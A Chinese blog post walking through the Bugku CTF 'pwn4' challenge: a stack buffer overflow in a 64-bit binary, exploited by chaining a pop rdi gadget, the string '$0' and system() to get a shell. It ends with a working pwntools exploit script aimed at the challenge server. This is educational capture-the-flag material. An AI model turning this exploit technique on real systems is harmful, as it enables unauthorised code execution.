pwn4-bugku

最新推荐文章于 2023-08-27 22:40:16 发布
最新推荐文章于 2023-08-27 22:40:16 发布
阅读量705 收藏 1
点赞数
分类专栏: pwn学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45427676/article/details/100887629
版权
checksec

首先用checksec命令查看有没有什么保护机制
在这里插入图片描述
没有开任何保护机制,用IDA(64位)打开查看main函数。
在这里插入图片描述

函数分析

# memset函数

在这里插入图片描述

# setvbuf函数

在这里插入图片描述

# read函数

在这里插入图片描述
经过分析函数可以知道缓冲区中是&s,大小为0x10uLL,read函数是将大小为0x30uLL的数据存放到缓冲区&s中,其大小超过了缓冲区的大小,存在栈溢出。

s大小

在这里插入图片描述
我们想要得到shell,看能不能找到‘bin\sh’,在终端使用命令【ROPgadget --binary pwn4 --string ‘/bin/sh’】,并没有得到我们想要的东西
在这里插入图片描述
查看字符串有没有在其他函数中被引用,查找发现一个system函数
在这里插入图片描述
还是没有得到shell,检测一下字符串
在这里插入图片描述
发现了一个$0,$0在linux中为shell或shell脚本的名称(长知识了)。

@小脑补

在这里插入图片描述

system()会调用fork()产生子进程,由子进程来调用/bin/sh -c string来执行参数string字符串所代表的命令,此命令执行完后随即返回原调用的进程。

所以如果将$0作为system的参数,能达到传入’/bin/sh’一样的效果。

先了解一下bash这个东西

在这里插入图片描述
查看$0在bash中的值(可以不看)

在这里插入图片描述
知道system函数的地址和 $0 的地址就可以将 $0 作为system函数的参数进行栈溢出,这是64位的寄存器,64位的寄存器传参与32位的不一样,32位的函数调用使用栈传参,64位的函数调用使用寄存器传参,分别用rdi、rsi、rdx、rcx、r8、r9来传递参数(参数个数小于7的时候),我们讲 $0的地址存入rdi寄存器中,然后通过rdi寄存器传参,那么我们要知道 $0的地址,rdi的地址以及system函数的地址

使用命令【ROPgadget --binary pwn4 --only ‘pop|ret’】得到rdi的地址
在这里插入图片描述
使用命令【ROPgadget --binary pwn4 --string ‘$0’】得到 $0的地址

在这里插入图片描述
在IDA中查看system函数的地址
在这里插入图片描述
首先填充缓冲区,大小为0x10,覆盖rbp,八个字节,传入pop rdi;ret的地址和$0,将栈中$0的地址弹出,存入rdi作为参数,在传入system地址进行调用。

脚本如下
from pwn import *
conn = remote('114.116.54.89', 10004)
# conn = process('./pwn4')
pop_rdi = 0x00000000004007d3 
bin_sh = 0x000000000060111f
system = 0x000000000040075A
payload = 'A' * (0x10+8) + p64(pop_rdi) + p64(bin_sh) + p64(system)  
conn.recvuntil('Come on,try to pwn me')
conn.sendline(payload)
conn.interactive()

在这里插入图片描述

夜行猫
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
新Bugku——瑞士军刀——pwn
2301_77163106的博客
08-20 327
我们可以很清楚看到有flag文件,进行抓取使用命令cat 相应文件--->cat flag,得到flag。回车并输入查找命令ls(可以了解一些其他的==>接下来我们只要访问他就行了打开kali进入终端。进入终端窗口输入 nc ip 端口。点击进入(也可以点击鼠标右键)题目给我们 nc ip 端口。
ctfshow pwn4
qq_39980610的博客
08-22 642
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2573
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
【awd系列】Bugku S3 AWD排位赛-9 pwn类型
最新发布
weixin_42072280的博客
08-27 1098
Bugku S3 AWD排位赛-9 pwn类型
bugku-PWN-瑞士军刀解析过程
weixin_46168073的博客
11-14 1908
一、启动场景 点进去,我发现点不进去,搞了半天,花了10个币才搞明白这个不是点的,而是连接的。 这里使用kali。 kali vmwar免安版本: 链接:https://pan.baidu.com/s/1SvbXZlx-0h5gN5__rOp2bg 提取码:1234 二、解题过程 安装kali之后,我们直接开大,然后输入nc 114.67.246.176 13340(端口有变是因为我重启了一次,这里输入,你的端口。) 然后ls,目录下有个flag目录,直接cat flag目录...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4008
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
Bugku pwn3
BengDouLove的博客
03-09 352
这道题保护机制全都是开启的 这个程序意思是一开始让你选择一个无关紧要的文件,打开这个文件之后读取文件内容打印,然后就是用户的输入 先输入要输入的内容有多长,之后写入thinking_note,这里thinking_note大小是固定的,所以这里造成栈溢出, 下一步判断是否624个字,也没啥用,好像每次都不对然后进入if,这里又可以读取0x270的内容 这里读入1000 在第一个read的...
bugku_pwn4
Vicl1fe的博客
10-26 447
https://blog.csdn.net/casuall/article/details/95865447
Pwn4 - Bugku
SkYe's Blog
10-22 381
Pwn4 - Bugku 程序基本情况 程序为64位,保护全关 代码审计 在main()函数中的read造成了栈溢出 IDAshift + F12检查有没有可疑字符串,同时检查有没有特殊函数如getshell() 在sub_400751()里面出现了调用system() 思路 main()函数存在栈溢出,可调用system()getshell,但是缺少一个参数/bin/sh。在字符串查找中...
bugku-pwn3
playmaker的博客
06-04 1639
程序是一个保护全关的64位程序,主逻辑如下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [rbp-10h] memset(&s, 0, 0x10uLL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 1...
Bugku pwn4
BengDouLove的博客
02-16 359
bugku pwn4 先ida打开elf文件,发现是64位,之前知道64位和32位有所不同但是还没有接触到过 程序里没什么,然后打开字符串子视图 有这么一句话,引起怀疑,然后双击点开,右键点开外部引用图表到 发现0x400751这个函数在调用这一段字符串,打开400751并且反汇编,发现是system函数,里面的参数正是这一段字符串,想到如果里面是系统指令就好了。 打开虚拟机,调试过程中也没有...
bugkuCTF平台逆向题第一道Easy_vb题解
iqiqiya的博客
12-27 7969
题目地址: http://123.206.31.85/files/6d5c35762f3e316cde9647c14fd0b56d/easy_vb.exe 下载后运行截图 查壳 无壳 直接载入OD 直接反汇编窗口右键à中文搜索引擎à智能搜索即可发现flag  IDA载入查看 发现IDA浏览窗口直接向下翻几下就可以发现
[BugkuCTF] PWN3
BurYiA的博客
11-06 772
PWN3 历经千辛万苦终于把这道题拿下了,不容易啊/哭 特此前来记录一下 题目拿到后我们首先checksec一下 保护全开啊有莫有,但是不慌(我承认我看到的时候慌了),继续分析吧 粗略的看一下可以发现有四个输入点(红),并且还有一个返回输入值的输出点(粉) ok,上ida瞅瞅,main函数没啥好说的,我们瞅瞅vul函数 显然我们可以利用那两个read来搞一下事情,他们都是都thinking_not...
Bugku pwn 1--wp
weixin_45427676的博客
03-25 374
打开题目之后发现只有: nc 114.116.54.89 10001 那就好处理了,直接在VM中执行这句命令。 这句命令什么意思呢?我一开始也不晓得,pwn题里面都有,所以还是要清楚的。 nc + ip地址 + 端口号(nc命令用于设置路由器) nc即netcat,是一个网络工具(Linux自带),有IP地址和端口号,就可以连接路由器,连接成功后,目标主机会运行题目文件,进行交互。一般还会有一...
栈溢出技巧-中
蚁景网安学院
04-02 1133
基于报错类的栈保护canary这个值被称作金丝雀(“canary”)值,指的是矿工曾利用金丝雀来确认是否有气体泄漏,如果金丝雀因为气体泄漏而中毒死亡,可以给矿工预警。在brop中也提到过,...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值